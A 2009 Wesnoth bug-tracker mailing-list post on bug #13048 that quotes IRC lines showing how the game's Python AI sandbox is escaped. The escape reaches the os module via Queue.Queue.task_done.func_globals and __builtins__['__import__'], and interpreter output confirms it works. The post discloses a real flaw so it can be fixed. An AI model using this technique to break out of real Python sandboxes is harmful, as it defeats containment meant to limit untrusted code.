[Wesnoth-bugs] [bug #13048] Hole in Python AI sandbox permits arbitrary code execution

Jérémy Rosen Sun, 22 Feb 2009 03:51:49 -0800

Follow-up Comment #5, bug #13048 (project wesnoth):

(12:18:51) dfranke: setting __all__ isn't going to close all the loopholes
that Python offers.
(12:19:26) dfranke: >>> import Queue
(12:19:26) dfranke: >>>
Queue.Queue.task_done.func_globals['__builtins__']['__import__']('os')
(12:19:26) dfranke: <module 'os' from '/usr/lib/python2.5/os.pyc'>
(12:19:26) dfranke:  
(12:21:12) dfranke: or more direct:  Queue.__builtins__['__import__']('os')
(12:21:46) dfranke: actually, the latter can prevented by __all__, I think.
(12:21:49) dfranke: but the former can't.
(12:22:15) dfranke: methinks Python just really wasn't made with sandboxing
in mind.


    _______________________________________________________

Reply to this item at:

  <http://gna.org/bugs/?13048>

_______________________________________________
  Message posté via/par Gna!
  http://gna.org/


_______________________________________________
Wesnoth-bugs mailing list
[email protected]
https://mail.gna.org/listinfo/wesnoth-bugs

[Wesnoth-bugs] [bug #13048] Hole in Python AI sandbox permits arbitrary code execution

Reply via email to